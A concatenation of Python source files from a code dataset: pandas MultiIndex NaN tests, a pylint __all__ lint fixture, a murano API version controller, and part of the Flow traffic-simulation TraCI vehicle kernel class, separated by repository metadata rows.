codes=[[0, -1, 1, 2, 3, 4], [0, -1, 3, 3, 3, 4]],
)
expected = MultiIndex.from_arrays([["128", 2], ["128", 2]])
tm.assert_index_equal(idx.dropna(), expected)
tm.assert_index_equal(idx.dropna(how="any"), expected)
expected = MultiIndex.from_arrays(
[[np.nan, np.nan, "128", 2], ["128", "128", "128", 2]]
)
tm.assert_index_equal(idx.dropna(how="all"), expected)
def test_nulls(idx):
# this is really a smoke test for the methods
# as these are adequately tested for function elsewhere
msg = "isna is not defined for MultiIndex"
with pytest.raises(NotImplementedError, match=msg):
idx.isna()
@pytest.mark.xfail(reason="isna is not defined for MultiIndex")
def test_hasnans_isnans(idx):
# GH 11343, added tests for hasnans / isnans
index = idx.copy()
# cases in indices doesn't include NaN
expected = np.array([False] * len(index), dtype=bool)
tm.assert_numpy_array_equal(index._isnan, expected)
assert index.hasnans is False
index = idx.copy()
values = index.values
values[1] = np.nan
index = type(idx)(values)
expected = np.array([False] * len(index), dtype=bool)
expected[1] = True
tm.assert_numpy_array_equal(index._isnan, expected)
assert index.hasnans is True
def test_nan_stays_float():
# GH 7031
idx0 = pd.MultiIndex(
levels=[["A", "B"], []], codes=[[1, 0], [-1, -1]], names=[0, 1]
)
idx1 = pd.MultiIndex(levels=[["C"], ["D"]], codes=[[0], [0]], names=[0, 1])
idxm = idx0.join(idx1, how="outer")
assert pd.isna(idx0.get_level_values(1)).all()
# the following failed in 0.14.1
assert pd.isna(idxm.get_level_values(1)[:-1]).all()
df0 = pd.DataFrame([[1, 2]], index=idx0)
df1 = pd.DataFrame([[3, 4]], index=idx1)
dfm = df0 - df1
assert pd.isna(df0.index.get_level_values(1)).all()
# the following failed in 0.14.1
assert pd.isna(dfm.index.get_level_values(1)[:-1]).all()
def test_tuples_have_na():
index = MultiIndex(
levels=[[1, 0], [0, 1, 2, 3]],
codes=[[1, 1, 1, 1, -1, 0, 0, 0], [0, 1, 2, 3, 0, 1, 2, 3]],
)
assert pd.isna(index[4][0])
assert pd.isna(index.values[4][0])
| 30.365217
| 85
| 0.580183
|
afcb2cd2413c35eb509560cf24f7a2a882ae639c
| 1,133
|
py
|
Python
|
virtual/Lib/site-packages/pylint/test/functional/names_in__all__.py
|
JamesKimari/pitch-one
|
aac9007716bf2e3b6446588a06508fac068f3d20
|
[
"MIT"
] | 35
|
2016-09-22T22:53:14.000Z
|
2020-02-13T15:12:21.000Z
|
virtual/lib/python3.6/site-packages/pylint/test/functional/names_in__all__.py
|
evantoh/patient-management-system
|
6637eb1344775633759165260ed99843581c0e72
|
[
"Unlicense"
] | 32
|
2018-05-01T05:24:43.000Z
|
2022-03-11T23:20:39.000Z
|
virtual/lib/python3.6/site-packages/pylint/test/functional/names_in__all__.py
|
evantoh/patient-management-system
|
6637eb1344775633759165260ed99843581c0e72
|
[
"Unlicense"
] | 88
|
2016-11-27T02:16:11.000Z
|
2020-02-28T05:10:26.000Z
|
# pylint: disable=too-few-public-methods,no-self-use, no-absolute-import,import-error
"""Test Pylint's use of __all__.
* NonExistant is not defined in this module, and it is listed in
__all__. An error is expected.
* This module imports path and republished it in __all__. No errors
are expected.
"""
from __future__ import print_function
from os import path
from collections import deque
from missing import Missing
__all__ = [
'Dummy',
'', # [undefined-all-variable]
Missing,
SomeUndefined, # [undefined-variable]
'NonExistant', # [undefined-all-variable]
'path',
'func', # [undefined-all-variable]
'inner', # [undefined-all-variable]
'InnerKlass', deque.__name__] # [undefined-all-variable]
class Dummy(object):
"""A class defined in this module."""
pass
DUMMY = Dummy()
def function():
"""Function docstring
"""
pass
function()
class Klass(object):
"""A klass which contains a function"""
def func(self):
"""A klass method"""
inner = None
print(inner)
class InnerKlass(object):
"""A inner klass"""
pass
| 22.66
| 85
| 0.655781
|
eab6989cee130838c739c635cb06aab0118184fe
| 1,923
|
py
|
Python
|
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | 1
|
2021-07-28T23:19:49.000Z
|
2021-07-28T23:19:49.000Z
|
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | null | null | null |
murano/api/versions.py
|
ISCAS-VDI/murano-base
|
34287bd9109b32a2bb0960c0428fe402dee6d9b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_serialization import jsonutils
from six.moves import http_client
import webob.dec
from murano.common import wsgi
CONF = cfg.CONF
class Controller(object):
"""A wsgi controller that reports which API versions are supported."""
def index(self, req):
"""Respond to a request for all OpenStack API versions."""
def build_version_object(version, path, status):
return {
'id': 'v%s' % version,
'status': status,
'links': [
{
'rel': 'self',
'href': '%s/%s/' % (req.host_url, path),
},
],
}
version_objs = []
version_objs.extend([
build_version_object(1.0, 'v1', 'CURRENT'),
])
response = webob.Response(request=req,
status=http_client.MULTIPLE_CHOICES,
content_type='application/json')
response.body = jsonutils.dumps(dict(versions=version_objs))
return response
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
return self.index(req)
def create_resource(conf):
return wsgi.Resource(Controller())
| 31.016129
| 78
| 0.601144
|
e7d76996ebdf02fbdc11f6b83d23af980fa00228
| 48,066
|
py
|
Python
|
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
flow/core/kernel/vehicle/traci.py
|
Bobobert/aflow
|
7d28e362f757397c0c5303bc495b10ed597e03d5
|
[
"MIT"
] | null | null | null |
"""Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
STEPS = 10
rdelta = 255 / STEPS
# smoothly go from red to green as the speed increases
color_bins = [[int(255 - rdelta * i), int(rdelta * i), 0] for i in
range(STEPS + 1)]
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# number of vehicles loaded but not departed vehicles
self.num_not_departed = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = 0
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = 0
self._arrived_rl_ids = []
# whether or not to automatically color vehicles
try:
self._color_by_speed = sim_params.color_by_speed
self._force_color_update = sim_params.force_color_update
except AttributeError:
self._force_color_update = False
# old speeds used to compute accelerations
self.previous_speeds = {}
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.num_not_departed = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
# copy over the previous speeds
vehicle_obs = {}
for veh_id in self.__ids:
self.previous_speeds[veh_id] = self.get_speed(veh_id)
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
arrived_rl_ids = []
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id in self.get_rl_ids():
arrived_rl_ids.append(veh_id)
if veh_id in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
self._arrived_rl_ids.append(arrived_rl_ids)
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
if veh_id in self.get_ids() and vehicle_obs[veh_id] is not None:
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. TrafficLightGridEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids = 0
self._arrived_ids = 0
self._arrived_rl_ids.clear()
self.num_not_departed = 0
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.network.network,
"template_vehicles"):
for veh_id in self.master_kernel.network.network. \
template_vehicles:
vals = deepcopy(self.master_kernel.network.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
# updated the list of departed and arrived vehicles
self._num_departed.append(sim_obs[tc.VAR_LOADED_VEHICLES_NUMBER])
self._num_arrived.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_NUMBER])
self._departed_ids = sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]
self._arrived_ids = sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]
# update the number of not departed vehicles
self.num_not_departed += sim_obs[tc.VAR_LOADED_VEHICLES_NUMBER] - \
sim_obs[tc.VAR_DEPARTED_VEHICLES_NUMBER]
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
self.__vehicles[veh_id]["follower_headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
if headway[0] in self.__vehicles:
leader = self.__vehicles[headway[0]]
# if veh_id is closer from leader than another follower
# (in case followers are in different converging edges)
if ("follower_headway" not in leader or
headway[1] + min_gap < leader["follower_headway"]):
leader["follower"] = veh_id
leader["follower_headway"] = headway[1] + min_gap
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
if veh_id not in self.__ids:
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
if veh_id not in self.__rl_ids:
self.__rl_ids.append(veh_id)
else:
if veh_id not in self.__human_ids:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION,
tc.VAR_ROAD_ID,
tc.VAR_SPEED,
tc.VAR_EDGES,
tc.VAR_POSITION,
tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI,
tc.VAR_FUELCONSUMPTION,
tc.VAR_DISTANCE
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
self.__sumo_obs[veh_id][tc.VAR_FUELCONSUMPTION] = \
self.kernel_api.vehicle.getFuelConsumption(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
self.num_rl_vehicles = len(self.__rl_ids)
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def reset(self):
"""See parent class."""
self.previous_speeds = {}
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
if veh_id in self.__ids:
self.__ids.remove(veh_id)
# remove from the vehicles kernel
if veh_id in self.__vehicles:
del self.__vehicles[veh_id]
if veh_id in self.__sumo_obs:
del self.__sumo_obs[veh_id]
# remove it from all other id lists (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
elif veh_id in self.__rl_ids:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
def get_arrived_ids(self):
"""See parent class."""
return self._arrived_ids
def get_arrived_rl_ids(self, k=1):
"""See parent class."""
if len(self._arrived_rl_ids) > 0:
arrived = []
for arr in self._arrived_rl_ids[-k:]:
arrived.extend(arr)
return arrived
else:
return 0
def get_departed_ids(self):
"""See parent class."""
return self._departed_ids
def get_num_not_departed(self):
"""See parent class."""
return self.num_not_departed
def get_fuel_consumption(self, veh_id, error=-1001):
"""Return fuel consumption in gallons/s."""
ml_to_gallons = 0.000264172
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_fuel_consumption(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_FUELCONSUMPTION, error) * ml_to_gallons
def get_previous_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_previous_speed(vehID, error) for vehID in veh_id]
return self.previous_speeds.get(veh_id, 0)
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_last_lc(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
if veh_id not in self.__rl_ids:
warnings.warn('Vehicle {} is not RL vehicle, "last_lc" term set to'
' {}.'.format(veh_id, error))
return error
else:
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=None):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=None):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=None):
"""See parent class."""
if error is None:
error = list()
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.network.get_edge_list()
junction_list = self.master_kernel.network.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.network.get_edge_list()) + len(
self.master_kernel.network.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.network.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
Parameters
----------
veh_id : str
name of the vehicle
edge_dict : dict < list<tuple> >
Key = Edge name
Index = lane index
Element = list sorted by position of (vehicle id, position)
Returns
-------
headway : list<float>
Index = lane index
Element = headway at this lane
tailway : list<float>
Index = lane index
Element = tailway at this lane
lead_speed : list<str>
Index = lane index
Element = speed of leader at this lane
follow_speed : list<str>
Index = lane index
Element = speed of follower at this lane
leader : list<str>
Index = lane index
Element = leader at this lane
follower : list<str>
Index = lane index
Element = follower at this lane
"""
this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.network.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
